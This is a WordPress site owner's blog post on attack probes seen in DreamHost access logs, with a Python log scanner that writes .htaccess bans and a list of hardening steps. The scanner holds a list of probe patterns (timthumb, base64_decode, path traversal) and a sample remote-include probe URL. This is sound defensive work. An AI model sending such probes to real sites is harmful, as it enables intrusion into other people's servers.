I’ve been analyzing my access and error logs for over a month now and I can make a few comments about good WordPress practices. From my 6 DreamHost WordPress installs on 3 different DreamHost machines I have seen a litany of bad behavior in general and bad WordPress behavior in particular. Before I go ANY further I want to make clear that DREAMHOST is awesome for allowing access to access logs and error logs, and what I’m about to write must be happening on EVERY shared host in the business.
I started writing a site-specific perl program with a mysql database to process daily and hourly access logs and error logs. My goal was to play whack-a-mole and use .htaccess to shut off bad people from accessing my 5 WordPress blogs. Since I started on January 19th, I’ve banned 350 IP addresses and 8 subnets (where I have a collection of 5 or more trolls on a single subnet). So far, about 25% of banned addresses return to try (unsuccessfully) again to get more info.
Many of the trolls are not specific to WordPress, like trolls trying to access phpmyadmin, trying to access directories that were deleted 5 years ago, trolling for crossdomain.xml, looking for /cgi-bin/cvename, trying to go up the directory structure (/…/…/…/), embedding HTTP in the php request, trying to encode php in the php request, trying to encode href, or weirdly trying to type +result:++ into the php request; a large number of trollers use the HTTP HEAD command to see what’s happening on your files; how about /.google-analytics/ga.js as a request? In a month, I think I’ve seen a lot of requests unrelated to people actually using the website.
I have seen some VERY specific WordPress attacks:
Lots of attempts to poke at wp-login; this usually starts with a signup troll that starts wp-signup.php, then moves on to wp-login?register and pokes around some. Next I’ve seen repeated attempts to crack passwords on wp-login. Repeatedly I’ve seen 1373 attempts in 30 seconds to crack wp-login. Since I started, I’ve installed the login lockdown plugin to close this hole.
Crud on the end of a WordPress php command, ESPECIALLY for plugins that are unusual. If you use a plugin that isn’t popular, expect to see attempts to check whether it will pass a command to Google search (this appears to be the holy grail of wp-hackers, since it will then possibly execute a php command). Lots of php?=http:xxx.com requests to probe how the command is handled, also php?dhjdjd=href(hhhh). When you see php?=base64_decode it’s an attempt to inject code into your WordPress site and become part of your php program (and therefore have your privileges as owner).
WordPress structure probing - where is wp-login? have you renamed wp-admin? Let’s look at wp-content/xmlrpc.php and see what we can find out. How about wp-includes/wlwmanifest.xml what can it tell me about the file structure?
Probing for previous WordPress hacks: over the last 10 days I’ve seen over 10 attacks by someone probing for every theme that ever supported timthumb. Within 20 seconds I get 150-200 requests for timthumb on every theme imaginable.
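The whack-a-mole approach described above, as an added example that is not the author's program: a small log scanner written in Python rather than the author's perl-plus-mysql setup, which flags an IP that floods wp-login.php (the author's 1373-attempts-in-30-seconds case) or sends timthumb/base64_decode-style probe requests, and emits the matching "deny from" lines for .htaccess. The log lines, IPs, thresholds and probe markers are constructed for illustration, not taken from the author's logs.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" access log line: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
PROBE_MARKERS = ("timthumb.php", "base64_decode", "=http", "../", "phpmyadmin")  # probe fragments from the post

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def is_probe(path):
    return any(marker in path.lower() for marker in PROBE_MARKERS)

def find_offenders(lines, threshold=20, window_seconds=30):
    """Map ip -> reason for IPs that send probes or >= threshold wp-login POSTs inside one window."""
    login_posts, offenders = defaultdict(list), {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that do not parse rather than crash on a corrupt log
        ip, ts, method, path, _status = rec
        if is_probe(path):
            offenders[ip] = "probe"
        elif method == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            login_posts[ip].append(ts)
    for ip, times in login_posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                offenders.setdefault(ip, "wp-login flood")
                break
    return offenders

def htaccess_deny_lines(offenders):
    """Apache 2.2-style 'deny from' lines (comment above each) to append to .htaccess."""
    return "\n".join(f"# {why}\ndeny from {ip}" for ip, why in sorted(offenders.items()))
def make_line(ip, sec, method, path, status=200):  # builds a constructed sample log line
    return f'{ip} - - [19/Jan/2012:10:00:{sec:02d} -0800] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'
SAMPLE_LOG = ([make_line("203.0.113.7", s, "POST", "/wp-login.php") for s in range(25)]
              + [make_line("198.51.100.4", s, "GET", "/2012/01/hello-world/") for s in (5, 40)]
              + [make_line("192.0.2.9", 12, "GET", "/wp-content/themes/x/timthumb.php?src=http://203.0.113.5/a.php", 404)])
```

Run find_offenders over a real access.log (one line per list item) and append the output of htaccess_deny_lines to .htaccess; tune threshold and window_seconds to your own traffic before trusting the result.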
What you can do to protect yourself:
ON PANEL at DreamHost:
Under Users, edit the user that runs your website and enable ‘Enhanced security’. This tightens the default file permissions on your website so that people who aren’t YOU can’t see what you have; specifically, you are protected from other accounts on the same shared machine.
Optional: I would disallow FTP and force everyone to use SSH, also under the user edit in panel.
On WordPress as an administrator:
UPDATE WORDPRESS and keep it updated. Most known bugs are fixed in new releases, so please update your version of WordPress.
Delete unused themes: people are probing unused themes for ways to crack your WordPress install and take control away from you. If you have 30 unused themes, you’re exposed to 30 potential threat areas.
Delete unused plugins: again, lots of unused code lying around to be probed by people.
Create an admin account with your own name and delete the account called ‘admin’; that is the username trolls look for when password cracking. Use a password on your admin accounts that WordPress doesn’t rate as weak.
Install a plugin called ‘login lockdown’ which will protect you against people trying to break into your accounts.
Install a plugin called ‘file monitor plus’; this seems to be a pain-in-the-ass plugin when you first install it, but it will save your life if you use it. It records ALL changes to ALL files on your website. It reports once an hour. If you are hacked, you’ll get a report within an hour that specific files have been added, deleted, etc.
A few things to be aware of:
wp-config.php needs to exist in the main WordPress directory, but it contains your database credentials. It’s read by WordPress itself but should NOT be accessible to visitors. One way to stop this is to edit .htaccess in your website directory (/home/user/website/) and add this to the end:

# block direct requests for wp-config.php
<Files wp-config.php>
order allow,deny
deny from all
</Files>
While you’re at it, you might want to stop people from fetching .htaccess itself:

# prevents people from seeing .htaccess
<Files .htaccess>
order allow,deny
deny from all
</Files>
Without going into excruciating detail, this .htaccess directive stops people from listing your directory structure (a directory without an index file would otherwise show its contents):

# disable directory browsing
Options -Indexes
I’m wondering, over a longer time frame, whether DreamHost could put in some security checks: 1200+ requests to wp-login in less than 5 minutes might be excessive? Or anyone trying to insert php code would be permanently banned from DreamHost?